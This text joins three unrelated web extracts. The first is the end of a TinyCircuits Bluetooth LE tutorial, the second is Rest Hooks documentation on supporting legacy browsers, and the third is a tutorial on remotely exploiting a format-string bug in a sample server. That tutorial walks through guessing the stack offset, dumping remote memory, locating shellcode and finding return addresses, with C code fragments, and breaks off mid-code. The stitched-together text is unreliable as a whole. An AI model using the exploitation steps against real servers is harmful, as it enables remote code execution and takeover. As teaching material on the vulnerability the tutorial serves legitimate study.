Once the two devices connect, your Serial Monitor should display something similar to the image below. Let's send a number, like '54' to our nRF UART ap. Type it into the Serial Monitor and press Send.
The application should display the message "RX: 54."
Now, we'll send our TinyZero a number. Type '108' into the application text box and tap Send.
The Serial Monitor should display the number 108. The number preceding it with a colon indicates the number of characters that were sent. No more than 20 characters may be sent between the devices at once.
Using the iOS app
Search for, and download the application nRF Connect. Make sure your phone is in discovery mode (Bluetooth is on).
Open up nRF Connect.
With the code running on the TiynDuino stack, the BLE TinyShield is discoverable. You should be able to see it on your app. Your device should have the name BlueNRG, click CONNECT:
With the text box open, you can now send commands with the app to the Bluetooth TinyShield. Try sending '800' and '2200':
The number preceding it with a colon indicates the number of characters that were sent. Only 20 characters may be sent between the two devices.
To send data from the TinyDuino stack to your phone, type into the Serial Monitor and press Send.
Now all you have to do is come up with a project that you can control from your phone!
Downloads
If you have any questions or feedback, feel free to email us or make a post on our forum. Show us what you make by tagging @TinyCircuits on Instagram, Twitter, or Facebook so we can feature it.
Thanks for making with us!
|
https://learn.tinycircuits.com/Communication/Bluetooth-Low-Energy_TinyShield_Tutorial/
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
Legacy browser (IE) support
Rest Hooks includes multiple bundles including a commonjs bundle that is compiled with maximum compatibility as well as an ES6 module bundle that is compiled to target modern browsers or react native.
Tools like webpack or rollup will use the ES6 modules to enable optimizations like tree-shaking. However,
the Javascript included will not support legacy browsers like Internet Explorer. If your browser target
includes such browsers (you'll likely see something like
Uncaught TypeError: Class constructor Resource cannot be invoked without 'new') you will need to follow the steps below.
Transpile Rest Hooks package
Note: Many out-of-the-box solutions like create react app will already perform this step and no additional work is needed.
Add preset to run only legacy transformations.
yarn add --dev babel-preset-react-app
npm install babel-preset-react-app
Add this section to your
webpack.config.js under the 'rules' section.
This will only run legacy transpilation, and skip all other steps as they are unneeded.
rules: [
// put other js rules here
{
test: /\.(js|mjs)$/,
loader: 'babel-loader',
include: [/node_modules/],
exclude: /@babel(?:\/|\\{1,2})runtime/,
options: {
babelrc: false,
configFile: false,
compact: false,
presets: [
[
require.resolve('babel-preset-react-app/dependencies'),
{ helpers: true },
],
],
cacheDirectory: true,
},
},
]
Polyfills
Rest-hooks is built to be compatible with old browsers, but assumes polyfills will already be loaded. If you want to support old browsers like Internet Explorer, you'll need to install core-js and import it at the entry point of your bundle.
Use CRA polyfill or follow instructions below.
yarn add core-js whatwg-fetch
npm install core-js whatwg-fetch
index.tsx
import 'core-js/stable';
import 'whatwg-fetch';
// ...
|
https://resthooks.io/docs/4.0
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
There are times when you need to get input from users during the execution of a program. To do this, Java offers several ways of reading console input.
Java Reading Console Input Methods
- Using BufferedReader Class
- Using Scanner Class
- Using Console Class
Now let us have a close look at these methods one by one.
Using the BufferedReader Class
This is the oldest technique in Java for reading console input, first introduced in JDK 1.0. Using this technique, we wrap System.in in an InputStreamReader, which in turn is wrapped in a BufferedReader.
This is done using the following syntax:
BufferedReader br = new BufferedReader (new InputStreamReader (System.in));
This links the character-based stream ‘br’ to the console for input through System.in.
NOTE: while using BufferedReader, the enclosing method must declare that it throws IOException (or handle it), otherwise an error will be shown at compile time.
The BufferedReader class is defined in the java.io package, so you need to import java.io before using it.
Let us have a look at an example to make the concept clearer.
In this example, we will get a string of characters entered from the user. The program will display the characters one by one to the user on the screen. It will continue till the termination character is encountered in the string.
// Program to read a string using BufferedReader class.
import java.io.*;

class bread
{
    public static void main(String args[]) throws IOException
    {
        char ch;
        BufferedReader br = new BufferedReader(new InputStreamReader (System.in));
        System.out.println ("Enter any string of your choice (To terminate Press \'z\' ");
        do
        {
            ch = (char) br.read ();
            System.out.println (ch);
        } while (ch != 'z');
    }
}
Output 1
Here, when z is encountered in the string of characters, the program will stop displaying any further characters entered by the user.
Output 2
Using the Scanner Class
The Scanner class was introduced in JDK 1.5 and has been widely used since. It provides various methods that ease the way we get input from the console. The Scanner class is defined in the java.util package, so you need to import it first.
The Scanner also uses System.in and its syntax is as follows:
Scanner obj_name = new Scanner (System.in);
Some of the utility methods the Scanner class provides are next(), nextInt(), nextDouble(), nextLine(), hasNext(), hasNextInt(), and hasNextDouble().
Let us have a look at an example to understand the concept in a better way. In this example we will read numbers from a user and will find the sum of these numbers and display the result to him.
// Program to calculate the sum of n numbers using Scanner class
import java.util.*;

class scanner_eg
{
    public static void main(String args[])
    {
        Scanner obj = new Scanner (System.in);
        double total = 0;
        System.out.println ("Enter numbers to add. Enter any string to end list.");
        while (obj.hasNext())
        {
            if (obj.hasNextDouble())
            {
                total += obj.nextDouble();
            }
            else
            {
                break;
            }
        }
        System.out.println ("Sum of the numbers is " + total);
    }
}
Output
NOTE: Whenever we call a next method, at run time it looks for input of the type it expects. If such input is not available, it throws an exception. Hence, it is always good practice to check the input beforehand by using the corresponding hasNext method before calling the next method.
Using the Console Class
This is another way of reading user input from the console in Java, introduced in JDK 1.6. This technique also uses System.in for reading the input.
This technique is best suited for reading input which does not require echoing of user input like reading user passwords. This technique reads user inputs without echoing the characters entered by the user.
The Console class is defined in the java.io package, which needs to be imported before using the Console class.
Let us consider an example.
import java.io.*;

class consoleEg
{
    public static void main(String args[])
    {
        String name;
        System.out.println ("Enter your name: ");
        Console c = System.console();
        name = c.readLine();
        System.out.println ("Your name is: " + name);
    }
}
Output
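Since the Console class is mainly useful for input that should not be echoed, here is a minimal sketch (my own example, not from the original tutorial) that reads a password with readPassword(); it assumes the program is run from a real terminal, since System.console() returns null otherwise.

import java.io.*;

class consolePwd
{
    public static void main(String args[])
    {
        Console c = System.console();
        if (c == null)
        {
            System.out.println ("No console available (e.g. when run from an IDE).");
            return;
        }
        // readPassword() suppresses echoing and returns a char[] rather than a String
        char[] pwd = c.readPassword ("Enter your password: ");
        System.out.println ("Password length: " + pwd.length);
    }
}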
NOTE: The only drawback of this technique is that it only works in interactive environments (such as a terminal); System.console() returns null when the program is run from most IDEs.
In Java we can read console input in three ways: using the BufferedReader class, the Scanner class, or the Console class. Depending on how you want to read user input, you can implement any of these in your programs.
|
https://csveda.com/java/java-reading-console-input/
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
Quicksort is a sorting technique with an average algorithmic complexity of O(n log n). Like Merge Sort, it falls under the divide and conquer approach. In this post we will discuss the concept and working of this extremely popular sorting mechanism. We will write and explain the Quicksort Python Program using stacks to store the sub-lists that are created while dividing.
Quicksort-Working
The basic logic of Quicksort is that after each cycle one element, called the pivot element, reaches its correct position. It means all elements smaller than the pivot element are on its left and all elements larger than the pivot element are on its right. This pivot element can be the first, the last or the middle element. Here we will consider the first element of the unsorted list as the pivot element.
Locate Smaller Elements from Right to Left
The list is scanned from right to left, looking for an element smaller than the pivot element. When such an element is located, the smaller element and the pivot element are interchanged. The index of the pivot element is also updated to the index where the interchange was done.
Locate Bigger Elements from Left to Right
Next, the unsorted list is scanned from left to right, looking for an element bigger than the pivot element. When such an element is located, it is interchanged with the pivot element. The index of the pivot element is also updated to the index of the bigger element with which it was interchanged.
This scanning from right to left and left to right, with interchanges, is repeated until the pivot element’s index and the current element’s index are equal. At this point the pivot element has taken its correct position: all the elements to its left are smaller and all the elements to its right are bigger than the pivot element.
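As a small worked illustration of this partitioning (my own example, not from the original post), consider the list [5, 8, 2, 9, 1] with 5 as the pivot:

[5, 8, 2, 9, 1]  pivot 5 at index 0
right-to-left finds 1 < 5, swap -> [1, 8, 2, 9, 5], pivot index 4
left-to-right finds 8 > 5, swap -> [1, 5, 2, 9, 8], pivot index 1
right-to-left finds 2 < 5, swap -> [1, 2, 5, 9, 8], pivot index 2
left-to-right reaches the pivot index, so scanning stops: 5 is in its final position, with {1, 2} to its left and {9, 8} to its right.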
Create Sub-lists Excluding Pivot Element
The index of the pivot element is then used to divide the list into two sub-lists. The left sub-list runs from the first index of the current sub-list to one less than the index of the pivot element. The right sub-list runs from the index of the pivot element plus one to the last index of the current sub-list. The boundaries of every newly created sub-list are maintained by pushing them onto the stacks called lower and upper. The sorting process ends when these stacks become empty.
Quicksort Python Program
In this code the lists lower and upper are used as stacks to maintain the boundaries of the sub-lists created by division after a pivot element takes its correct position. The append() function of a Python list is used to push, and the pop() function is used to pop, stack elements.
def quick(arr,first,last,dr):
    i=first
    j=last
    pivot=first
    while(1):
        if dr=='rl':
            #scan from right to left to find an element smaller than pivot
            while arr[pivot]<=arr[j] and pivot!=j:
                j=j-1
            if pivot==j: #stop if scanning crosses pivot index
                dr='nn'
            if arr[pivot]>arr[j]: #Interchange pivot element and smaller element on right
                temp=arr[j]
                arr[j]=arr[pivot]
                arr[pivot]=temp
                pivot=j
                dr='lr' #change direction of scanning
            continue
        if dr=='lr':
            #scan from left to right to find an element bigger than pivot
            while arr[pivot]>=arr[i] and pivot!=i:
                i=i+1
            if pivot==i: #stop if scanning crosses pivot index
                dr='nn'
            if arr[pivot]<arr[i]: #Interchange pivot element and bigger element on left
                temp=arr[i]
                arr[i]=arr[pivot]
                arr[pivot]=temp
                pivot=i
                dr='rl' #change direction of scanning
            continue
        if dr=='nn':
            break
    return pivot #return correct position of pivot element

def quicksort(arr,num):
    beg=0
    end=0
    mid=0
    top=0
    #initialise stacks to store sublist start and end indices
    lower=[]
    upper=[]
    #push array boundaries
    lower.append(0)
    upper.append(num-1)
    while (top!=-1):
        #pop boundaries of a sublist
        beg=lower.pop()
        end=upper.pop()
        top=top-1
        #call quick to place first element at correct position and get its index
        mid=quick(arr,beg,end,'rl')
        #create sublists by excluding correctly placed pivot element
        if (beg<mid-1):
            #push left sublist boundaries
            lower.append(beg)
            upper.append(mid-1)
            top=top+1
        if (mid+1<end):
            #push right sublist boundaries
            lower.append(mid+1)
            upper.append(end)
            top=top+1

#display data of the array
def disparr(arr,n):
    i=0
    print("Array elements are--->")
    while (i<n):
        print(arr[i])
        i=i+1

arrlist=[]
n=0
t=0
n=int(input("Number of elements you want to add--->"))
while (t<n):
    arrlist.append(int(input("input value--->")))
    t=t+1
print("Before Sorting:")
disparr(arrlist,n)
quicksort(arrlist,n)
print("After Sorting:")
disparr(arrlist,n)
Output Quicksort Python Code
|
https://csveda.com/quicksort-python-program/
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
README
@fullstack-one/config
Configuration management for fullstack-one packages and applications.
General
A configuration module is a configuration registered with
@fullstack-one/config singleton, e.g. by other
@fullstack-one packages.
An application is the main program, that utilizes the
@fullstack-one framework.
The main idea is, that each package registers a configuration module with a set of properties it requires to run. The values of those properties depend on multiple configuration sources, that are merged in a fixed hierarchy. The following shows the merging hierarchy with the primary configuration on top and the most subsidiary configuration at the bottom:
process.env configuration ↑ application environment configuration ↑ application default configuration ↑ module environment configuration ↑ module default configuration
Hint: If any value is still null after the merge,
@fullstack-one/config will throw an error.
Setup
Setup for @fullstack-one packages
First add the config package as a dependency to your package:
npm install --save @fullstack-one/config
Load the config singleton using the
@fullstack-one/di package and register your configuration via the path of your
config directory as a configuration module, e.g.:
import { Config } from "@fullstack-one/config";

class MyFullstackOnePackage {
  private myConfig: Config;

  constructor(@Inject((type) => Config) config) {
    this.myConfig = config.registerConfig("MyConfig", `${__dirname}/../config`);
  }
}
@fullstack-one/config goes into the specified directory and tries to find the
default.js. Additionally, the environment config, e.g.
development.js, is loaded based on
process.env.NODE_ENV. The default configuration is mandatory (if not given an error is thrown) and the environment configuration is optional. The configuration directory may look like this:
$ cd config && find .
.
./default.js
./development.js
./test.js
./production.js
The configuration files only describe the configuration module and may look like this:
module.exports = {
  'a': true,
  'b': {
    'c': null,
    'd': 'foo'
  }
}
Setup in the Application
As soon as any
@fullstack-one package is loaded and initialized, that uses
@fullstack-one/config, the application is required to have a
./package.json and a
./config directory on the same level as its main file (given by
require.main.filename). If one of these is not given,
@fullstack-one/config throws an error.
Analogously to the packages, the application has to have a
default.js and may have environment configuration files. The application's configuration files do not describe only one configuration module, but all in one object, e.g.:
module.exports = {
  'MyFullstackOnePackage': {
    'a': true,
    'b': {
      'c': null,
      'd': 'foo'
    }
  },
  'Package2': { ... },
  ...
}
Hint: It does not have to include all properties, as the objects will be merged.
Setup the process environment
On registration of a configuration module the process environment is loaded via
process.env. The name of the variable is interpreted as path in the whole configuration object. For example, the following process environment variable would lead to the respective change in the config object:
export MyFullstackOnePackage.b.c=changed
{ "MyFullstackOnePackage": { "a": true, "b": { "c": "changed", "d": "foo" } }, "Package2": { ... }, ... }
Usage
You can use
registerConfig(moduleName, configDirPath),
registerApplicationConfigModule(moduleName, configObject) and
getConfig(moduleName) as described above. Find examples in
./test.
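For illustration, a minimal sketch of reading a registered module's merged configuration (assuming config is the injected Config instance from the setup snippet above, and reusing the example properties from this README):

// 'config' is the injected Config singleton from the setup example above
const myConfig = config.getConfig("MyConfig");

// myConfig holds the merged values, e.g. { a: true, b: { c: "changed", d: "foo" } }
console.log(myConfig.b.d); // "foo"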
Dangerzone
You can also get the whole config object containing all config modules using
dangerouslyGetWholeConfig(). If you are, for example, in the middle of a boot process, some config modules might not have been set yet.
|
https://www.skypack.dev/view/@fullstack-one/config
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
Comment on Tutorial - Sessions in JSP By aathishankaran
Comment Added by : Ashwin perti
Comment Added at : 2009-07-08 04:43:55
Comment on Tutorial : Sessions in JSP By aathishankaran
This matter is really too code will not execute using above main method
|
https://java-samples.com/showcomment.php?commentid=34111
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
Let's recap how we generate daily returns from a time series of pricing data.
Given a series of stock prices, the daily return on day
d is equal to the price at day
d divided by the price at
d - 1, minus one. For example, if the stock closed at $100 on day
d - 1 and at $110 on day
d, the corresponding daily return is:
110 / 100 - 1 # = 1.1 - 1 = 0.1 = 10%
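As a quick sketch of how this computation looks in pandas (my own example; it assumes prices is a DataFrame of closing prices indexed by date):

import pandas as pd

def compute_daily_returns(prices: pd.DataFrame) -> pd.DataFrame:
    # price on day d divided by price on day d - 1, minus one
    # (the first row has no previous day, so it comes back as NaN)
    return (prices / prices.shift(1)) - 1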
Let's look at a plot of daily return data.
It's hard to draw any exciting conclusions by looking at this data on a day-to-day basis. There are more illustrative ways to visualize this data, and this lesson considers two types of visualizations: histograms and scatter plots.
Let's start by looking at histograms. A histogram is a type of bar chart in which all possible values are segregated into bins, and the height of each bin corresponds to the number of data points in that bin.
Suppose that we've taken all of the SPY pricing data from over the years, generated an array of daily returns, and created a histogram from those returns.
Which of the following shapes would the histogram most likely have?
There are several statistics we can compute that help us characterize our histogram.
For example, we might be interested in the mean, which tells us the average return, or the standard deviation, which gives us information about how the data is distributed about the mean.
Another significant statistic is kurtosis. Kurtosis describes the tails of our distribution; specifically, kurtosis gives us a measure of how much the tails of our distribution differ from those of a Gaussian, or normal, distribution.
In our case, we have "fat tails", which means that our data contains more values further from the mean than we would see if the distribution was completely normal. If we were to measure the kurtosis, we would get a positive value.
On the other hand, a negative kurtosis indicates that there are fewer occurrences in the tails than would be expected if the distribution in question was normal.
Let's look at the daily returns for SPY from 2009 through 2012.
We want to turn this data into a histogram. Of course, we can't create any plots without matplotlib:
import matplotlib.pyplot as plt
Given a DataFrame
df of SPY daily returns, we can create a histogram with one line of code:
df.hist()
Let's see the plot.
Note that we did not specify the number of bins that we wanted to use in our histogram, so we were given ten, the default. Of course, pandas is flexible and lets us supply the number of bins using the
bins keyword:
df.hist(bins=20)
Let's see our new histogram.
Notice that the width of each bar has decreased, and the number of bars has increased.
We can calculate the mean
mean and standard deviation
std of the SPY daily returns in our DataFrame
df:
df['SPY'].mean()
df['SPY'].std()
If we print out these values, we see the following.
We want to add these values to our daily returns histogram plot. Thankfully, matplotlib exposes an
axvline method that allows us to draw vertical lines on the current graph.
We can draw a vertical line at the x-value of
mean like so:
plt.axvline(mean, color='w', linestyle='dashed', linewidth=2)
This method call instructs matplotlib to draw a white, dashed line of width two at the x-value of
mean.
Let's see how it looks.
We can draw a vertical line at the x-values of positive
std and negative
std like so:
plt.axvline(std, color='r', linestyle='dashed', linewidth=2)
plt.axvline(-std, color='r', linestyle='dashed', linewidth=2)
These method calls instruct matplotlib to draw a red, dashed line of width two at the x-value of
+std and
-std.
Aside: I think what she meant to do was plot the standard deviation on either side of the mean:
plt.axvline(mean + std, color='r', linestyle='dashed', linewidth=2)
plt.axvline(mean - std, color='r', linestyle='dashed', linewidth=2)
If we plot these lines, we see the following figure.
We can retrieve the kurtosis of our daily returns data using the
kurtosis method:
df.kurtosis()
If we print the kurtosis, we get a positive value, which confirms that we have the "fat tails" described above.
Now we want to plot two histograms: one for SPY daily returns and one for XOM (Exxon) daily returns.
Given a
daily_returns DataFrame that contains daily returns for SPY and XOM, we can create the two histograms we need like so:
daily_returns.hist(bins=20)
If we print the histograms, we see the following.
Notice that we have two distinct subplots. Instead, we want the histograms to share an x- and y-axis so that we can more easily compare the data. We can accomplish this like so:
daily_returns['SPY'].hist(bins=20, label="SPY")
daily_returns['XOM'].hist(bins=20, label="XOM")
plt.legend(loc="upper right")
The
label parameter we pass to the
hist method helps us differentiate the plots by adding labels to the legend generated by the
legend method.
Let's take a look at the histograms.
Now that the histograms are on the same axes, we can compare their peaks and tails more easily.
Let's compare the daily returns of SPY and XYZ.
We can see that XYZ frequently moves in the same direction as SPY, although sometimes it moves further. Occasionally, SPY and XYZ move in different directions.
We can use a scatterplot to visualize the relationship between SPY and XYZ better. A scatterplot is a graph that plots the values of two variables along two axes.
In our case, we plot the daily returns of SPY against the daily returns of XYZ. Each day in our original data becomes a point in our scatterplot: the value of the x-coordinate is the SPY return, and the value of the y-coordinate is the XYZ return.
Let's consider the daily returns circled above. On this day, the return of SPY was about 1%, while the return of XYZ was slightly higher. These returns map to a point of (1, ~1.05) on our scatterplot.
Let's consider another example.
On the second day circled above, SPY and XYZ were moving in different directions. SPY was in positive territory, while XYZ was in negative territory. These returns map to a point near (1, -1) on our scatterplot.
We can continue this process to fill out our scatterplot.
Even though the data points are somewhat scattered, we do see a relationship between the daily returns of SPY and XYZ.
It's relatively common practice to take this scatterplot of daily return data and fit a line to it using linear regression.
We can look at some properties of this best-fit line. One property we might be interested in is the slope. Let's assume for this example that the slope is 1.
In financial terminology, the slope is usually referred to as beta. Beta indicates how reactive a stock is to the market.
In our example, we have a beta of one. This value of beta indicates that, on average, when the market goes up one percent, this particular stock also goes up one percent.
If we had a higher beta, like 2, we would expect our stock to move by two percent every time the market moved by one percent.
We can also consider another property of the best-fit line: the y-intercept. This value, called alpha, indicates how well the stock performs, on average, relative to the market.
If alpha is positive, as is the case here, it means that the stock is outperforming the market, on average. On the other hand, if alpha is negative, it means that the stock is performing worse than the market.
Many people mistakenly confound slope and correlation; in other words, if they find that the slope of the line that fits the data is one, they assume that the data must be correlated.
This assumption is not correct. For example, we can have a shallow slope and a high correlation, or a steep slope and a low correlation.
The slope of the best-fit line is nothing more than a property of that line. On the other hand, correlation measures the interdependence between two variables - the performance of a stock and the performance of the market, for example.
Correlation values run from zero to one, where zero means no correlation and one means perfect correlation. We can assess correlation visually by examining how "tightly" the data points in our scatterplot surround the best-fit line.
In this section, we are going to compare the scatterplots of SPY vs. XOM and SPY vs. GLD.
Given a DataFrame
daily_returns containing daily return data for SPY, XOM, and GLD, we can create a scatterplot of SPY vs. XOM like this:
daily_returns.plot(kind='scatter', x='SPY', y='XOM')
Note that because we have more than two columns in
daily_returns, we have to specify which columns we want to plot along our axes.
Let's look at our first scatterplot.
Similarly, we can create a scatterplot of SPY vs. GLD from the same DataFrame:
daily_returns.plot(kind='scatter', x='SPY', y='GLD')
Let's look at the scatterplots side by side.
With our two plots in hand, we now want to fit a line to the data in each plot. For that, we need NumPy.
Assume we have an array-like object of independent variables
x and a similar object of dependent variables
y. We can compute the slope
m and intercept
b of the best-fit line mapping
x to
y like so:
m, b = np.polyfit(x, y, 1)
Note that we pass 1 to specify that we want a first-degree polynomial: a straight line.
Back to our context, we can calculate the beta (slope)
beta_XOM and alpha (y-intercept)
alpha_XOM values of the best-fit line for SPY and XOM like this:
beta_XOM, alpha_XOM = np.polyfit(daily_returns['SPY'], daily_returns['XOM'], 1)
Now that we have
alpha_XOM and
beta_XOM, we can calculate the y-values of the best-fit line using the SPY data as the x-values:
beta_XOM * daily_returns['SPY'] + alpha_XOM
We can plot the best-fit line accordingly:
plt.plot(daily_returns['SPY'], beta_XOM * daily_returns['SPY'] + alpha_XOM, '-', color='r')
Note that we include the last two parameters to get a red line plot.
Let's look at the best-fit line.
If we print out the alpha and beta values for the XOM line and the GLD line, we see the following.
Remember that the beta value shows how a stock moves with respect to SPY. We can see that the beta value for XOM is greater than that for GLD, which means that XOM is more reactive to the market than GLD.
Remember also that the alpha value shows how well a stock performs with respect to SPY. We can see that the alpha value for GLD is higher than that for XOM, which indicates that GLD performs better, relative to SPY, than XOM.
The following graph of prices confirms that GLD outperforms SPY, and SPY outperforms XOM.
Finally, we can find the correlation between the daily returns of SPY, XOM, and GLD with one method call:
daily_returns.corr(method='pearson')
We can specify the method by which we want to calculate the correlation. We choose Pearson, the most common method.
If we print out the correlation, we see the following table.
We can see that SPY and XOM are highly correlated, while SPY and GLD have a very low correlation.
Let's check the SPY vs. GLD scatterplot and best-fit line to verify.
Indeed, we see that the data points do not fit the line tightly.
In many cases, in financial research, we assume that returns are normally distributed. This assumption can be dangerous because it ignores kurtosis, the probabilities that lie in the tails.
In the early 2000s, investment banks built bonds based on mortgages. They assumed that the distribution of returns for these mortgages was normally distributed. On that basis, they were able to show that these bonds had a very low probability of default.
They made two mistakes, however. First, they assumed that the return of each of these mortgages was independent and, second, that this return would be normally distributed.
Both of these assumptions proved to be wrong as massive numbers of homeowners defaulted on their mortgages. It was these defaults that precipitated the Great Recession of 2008.
|
https://www.omscs.io/machine-learning-trading/histograms-scatter-plots/
|
CC-MAIN-2022-33
|
en
|
refinedweb
|
How to Remotely Exploit Format String Bugs - A practical tutorial. Includes info on guessing the offset, guessing the address of the shellcode in the stack, using format string bugs as debuggers, examples, etc.
c323add4e7a0e2f2f14ec27d9d50002992564b1d0be3d391722da88350a25a83
Howto remotely and automatically exploit a format bug
Frédéric Raynal <pappy@miscmag.com>
Exploiting a format bug remotely can be something very funny. It
allows to very well understand the risks associated to this kind of
bugs. We won't explain here the basis for this vulnerability (i.e. its
origin or the building of the format string) since there are already
lots of articles available (see the bibliography at the end).
--[ 1. Context : the vulnerable server ]--
We will use a very minimalist server (but nevertheless pedagogic) throughout
this paper. It requests a login and password, then it echoes its
inputs. Its code is available in appendix 1.
To install the fmtd server, you'll have to configure inetd so that
connections to port 12345 are allowed:
# /etc/inetd.conf
12345 stream tcp nowait raynal /home/raynal/MISC/2-MISC/RemoteFMT/fmtd
Or with xinetd:
# /etc/xinetd.conf
service fmtd
{
type = UNLISTED
user = raynal
group = users
socket_type = stream
protocol = tcp
wait = no
server = /tmp/fmtd
port = 12345
only_from = 192.168.1.1 192.168.1.2 127.0.0.1
}
Then restart your server. Don't forget to change the rules of your
firewall if you are using one.
Now, let's see how this server is working:
$ telnet bosley 12345
Trying 192.168.1.2...
Connected to bosley.
Escape character is '^]'.
login: raynal
password: secret
hello world
hello world
^]
telnet> quit
Connection closed.
Let's have a look at the log file:
Jan 4 10:49:09 bosley fmtd[877]: login -> read login [raynal^M ] (8) bytes
Jan 4 10:49:14 bosley fmtd[877]: passwd -> read passwd [bffff9d0] (8) bytes
Jan 4 10:49:56 bosley fmtd[877]: vul() -> error while reading input buf [] (0)
Jan 4 10:49:56 bosley inetd[407]: pid 877: exit status 255
During the previous example, we simply enter a login, a password and a
sentence before closing the connexion. But what happens when we feed
the server with format instructions:
telnet bosley 12345
Trying 192.168.1.2...
Connected to bosley.
Escape character is '^]'.
login: raynal
password: secret
%x %x %x %x
d 25207825 78252078 d782520
The instructions "%x %x %x %x" being executed, it shows that our
server is vulnerable to a format bug.
<off topic>
In fact, all programs acting like that are not vulnerable to a
format bug:
int main( int argc, char ** argv )
{
char buf[8];
sprintf( buf, argv[1] );
}
Using %hn to exploit this leads to an overflow: the formatted
string is getting greater and greater, but since no control is
performed on its length, an overflow occurs.
</off topic>
Looking at the sources reveals that the troubles come from vul()
function:
...
snprintf(tmp, sizeof(tmp)-1, buf);
...
since the buffer <buf> is directly available to a malicious user, the
latter is allowed to take control of the server ... and thus gain a
shell with the privileges of the server.
--[ 2. Requested parameters ]--
The same parameters as for a local format bug are required here:
* the offset to reach the beginning of the buffer ;
* the address of a shellcode placed somewhere is the server's memory ;
* the address of the vulnerable buffer ;
* a return address.
The exploit is provided as an example in appendix 2. The following parts of
this article explain how it was designed.
Here are some variables used in the exploit:
* sd : the socket between client (exploit) and the vulnerable server ;
* buf : a buffer to read/write some data ;
* read_at : an address in the server's stack ;
* fmt : format string sent to the server.
--[ 2.1 Guessing the offset ]--
This parameter is always necessary for the exploitation of this kind of
bug, and its determination works in the same way as with a local
exploitation:
telnet bosley 12345
Trying 192.168.1.2...
Connected to bosley.
Escape character is '^]'.
login: raynal
password: secret
AAAA%1$x
AAAAa
AAAA%2$x
AAAA41414141
Here, the offset is 2. It is very easy to guess it automatically, and
that is what the function get_offset() aims at. It sends the string
"AAAA%<val>$x" to the server. If the offset is <val>, then the server
answers with the string "AAAA41414141" :
#define MAX_OFFSET 255
for (i = 1; i<MAX_OFFSET && offset == -1; i++) {
snprintf(fmt, sizeof(fmt), "AAAA%%%d$x", i);
write(sock, fmt, strlen(fmt));
memset(buf, 0, sizeof(buf));
sleep(1);
read(sock, buf, sizeof(buf))
if (!strcmp(buf, "AAAA41414141"))
offset = i;
}
--[ 2.2 Guessing the address of the shellcode in the stack ]--
If one has to place a shellcode in the memory of the server, it then
has to guess its address. It can be placed in the vulnerable buffer,
or in any other place: we don't care due to format bug :) For
instance, some ftp servers allowed storing it in the password (PASS),
with few checks for the anonymous or ftp account. Here, our
server works that way.
-- --[ Making a format bug a debugger ]-- --
We aim at finding the address of the shellcode placed in the memory of
the server. So, we will transform the remote server into a remote debugger!
Using the format string "%s", one is allowed to read until the buffer
is full or a NULL character is met. So, by sending successively "%s"
to the server, the exploit is able to dump locally the memory of the
remote process:
<addr>%<offset>$s
In the exploit, it is performed in 2 steps:
1. The function get_addr_as_char(u_int addr, char *buf) converts
addr into char :
*(u_int*)buf = addr;
2. then, the next 4 bytes contains the format instruction.
The format string is then sent to the remote server:
get_addr_as_char(read_at, fmt);
snprintf(fmt+4, sizeof(fmt)-4, "%%%d$s", offset);
write(sd, fmt, strlen(fmt));
The client reads a string at <addr>. If it contains no shellcode, the
next reading is performed at this same address, to which one adds the
amount of read bytes (i.e. the return value of read()).
However, all the <len> read characters should not be considered. The
vulnerable instruction on the server is something like:
sprintf(out, in);
To build the out buffer, sprintf() starts by parsing the <in>
string. The first four bytes are the address we intend to read at: they
are simply copied to the output buffer. Then, a format instruction is
met and interpreted. Hence, we have to remove these 4 bytes:
while( (len = read(sd, buf, sizeof(buf))) > 0) {
[ ... ]
read_at += (len-4+1);
[ ... ]
}
-- --[ What to look for ? ]-- --
Another problem is how to identify the shellcode in memory. If one
just looks for all its bytes in the remote memory, there is a risk to
miss it. Since the buffer is ended by a NULL byte, the string placed
just before can contain lots of NOPs. Hence the reading of the
shellcode can be split among 2 readings.
To avoid this, if the amount of read characters is equal to the size
of the buffer, the exploit "forgets" the last sizeof(shellcode) bytes
read from the server. Thus, the next reading is performed at:
while( (len = read(sd, buf, sizeof(buf))) > 0) {
[ ... ]
read_at += len;
if (len == sizeof(buf))
read_at-=strlen(shellcode);
[ ... ]
}
This case has never been tested ... so I don't guarantee it works ;-/
-- --[ Guessing the exact address of the shellcode ]-- --
Pattern matching in a string is performed by the function:
ptr = strstr(buf, pattern);
It returns a pointer to the parsed string addressing the first byte of
the searched pattern. Thus, the position of the shellcode is:
addr_shellcode = read_at + (ptr-buf);
Except that the buffer contains bytes we need to ignore !!! As we have
previously noticed while exploring the stack, the first four bytes of
the output buffer are in fact the address we just read at:
addr_shellcode = read_at + (ptr-buf) - 4;
-- --[ shellcode : a summary ]-- --
Sometimes, some code is worthier than long explanations:
while( (len = read(sd, buf, sizeof(buf))) > 0) {
if ((ptr = strstr(buf, shellcode))) {
addr_shellcode = read_at + (ptr-buf) - 4;
break;
}
read_at += (len-4+1);
if (len == sizeof(buf)) {
read_at-=strlen(shellcode);
}
memset (buf, 0x0, sizeof (buf));
get_addr_as_char(read_at, fmt);
write(sd, fmt, strlen(fmt));
}
--[ 2.3 Guessing the return address ]--
The last (but not the least) parameter to determine is the return
address. We need to find a valid return address in the remote process
stack to overwrite it with the one of the shellcode.
We won't explain here how the functions are called in C, but simply
remind how variables and parameters are placed in the stack. Firstly
the arguments are placed in the stack from the last one (upper) to the
first one (most down). Then, instructions registers (%eip) is saved on
the stack, followed by the base pointer register (%ebp) which
indicates the beginning of the memory for the current function. After
this address, the memory is used for the local variables. When the
function ends, %eip is popped and clean up is made on the stack. This
just means that the registers %esp and %ebp are popped according to
the calling function. The stack is not cleaned up in any way.
So, our goal is to find a place where the register %eip is saved. Two
steps are used:
1. find the address of the input buffer
2. find the return address of the function the vulnerable buffer
belongs to.
Why do we need to look for the address of the buffer ? All pairs
(saved ebp, saved eip) that we could find in the stack are not good
for our purpose. The stack is never really cleaned up between
different calls. So it contains values used for previous calls, even
if they won't really be used by the process.
Thus, by firstly guessing the address of the vulnerable buffer, we
have a point above which all pairs (saved ebp, saved eip) are valid
since the vulnerable buffer is itself on the top of the stack :)
-- --[ Guessing the address of the buffer ]-- --
The input buffer is easily identified in the remote memory: it is a
mirror for the characters we feed it with. The server fmtd copies them
without any modification (Warning: if some characters were placed by
the server before its answer, they should be considered).
So, we simply have to look at the exact copy of our format string in
the server's memory:
while((len = read(sd, buf, sizeof(buf))) > 0) {
if ((ptr = strstr(buf, fmt))) {
